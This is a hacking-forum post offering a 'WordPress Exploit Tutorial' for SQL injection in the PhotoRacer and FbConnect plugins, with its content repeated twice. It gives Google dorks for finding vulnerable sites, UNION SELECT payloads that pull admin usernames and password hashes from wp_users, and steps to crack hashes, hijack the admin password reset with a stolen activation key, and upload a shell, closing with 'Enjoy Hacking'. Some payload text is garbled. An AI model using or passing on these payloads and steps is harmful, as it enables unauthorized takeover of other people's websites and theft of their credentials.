Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked WordPress Exploit TutorialWordPress Exploit Tutorial

dEEpEst

By ADMINdEEpEst
in Bugs & Exploits

 Share

Recommended Posts

dEEpEst Hacker

ADMINdEEpEst

Posted
Posted

[HIDE-THANKS]###

# Title : PhotoRacer & FbConnect SQL Injection Vulnerability

# Type : SQL Injection Exploit

# Security Risk : High

###

 

###

# Google Dork 1 :

# inurl:"wp-content/plugins/photoracer/viewimg.php?id=1

# Google Dork 2 :

# inurl:"?fbconnect_action=myhome&userid=1

###

 

###

# Exploit 1 :

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users--

# Exploit 2 :

/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_*login,0x3a,user_pass )***8203;***8203;,7,8,9,10,11,12+from+wp_users--

###

 

[~] Choose your target try to inject by using tools (Havij , Sql Poizon etc ) or Manualy ...

[~] Once you find Data : User, E-mail, Password or Activation Key, you need to crack the MD5(Wordpress) Hash

Example : $P$B4/7SILDqcoRQNvJiEgsAJW9midgZO0 = Administrator

[~] If you cant crack the Hash try another way " Reset Admin Password "

Example : http://www.yourtarget.com/wp-login.php?a...stpassword'>http://www.yourtarget.com/wp-login.php?a...stpassword

[~] And paste the administrator E-mail and click "Get New Password"

[~] Now inject again because you need to take the activication key, that will be like this

Example : user_activation_key=1k34jcusHodi56edwkxA

[~] Now reset the Admin password using activation key

Example : http://www.yourtarget.com/wp-login.php?a...ogin=admin'>http://www.yourtarget.com/wp-login.php?a...ogin=admin

[~] Set The New Password login upload shell or whatever you want thats all ... Enjoy Hacking !

 

###

# Title : PhotoRacer & FbConnect SQL Injection Vulnerability

# Type : SQL Injection Exploit

# Security Risk : High

###

 

###

# Google Dork 1 :

# inurl:"wp-content/plugins/photoracer/viewimg.php?id=1

# Google Dork 2 :

# inurl:"?fbconnect_action=myhome&userid=1

###

 

###

# Exploit 1 :

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users--

# Exploit 2 :

/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_*login,0x3a,user_pass )***8203;***8203;,7,8,9,10,11,12+from+wp_users--

###

 

[~] Choose your target try to inject by using tools (Havij , Sql Poizon etc ) or Manualy ...

[~] Once you find Data : User, E-mail, Password or Activation Key, you need to crack the MD5(Wordpress) Hash

Example : $P$B4/7SILDqcoRQNvJiEgsAJW9midgZO0 = Administrator

[~] If you cant crack the Hash try another way " Reset Admin Password "

Example : http://www.yourtarget.com/wp-login.php?a...stpassword

[~] And paste the administrator E-mail and click "Get New Password"

[~] Now inject again because you need to take the activication key, that will be like this

Example : user_activation_key=1k34jcusHodi56edwkxA

[~] Now reset the Admin password using activation key

Example : http://www.yourtarget.com/wp-login.php?a...ogin=admin

[~] Set The New Password login upload shell or whatever you want thats all ... Enjoy Hacking ![/HIDE-THANKS]

Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.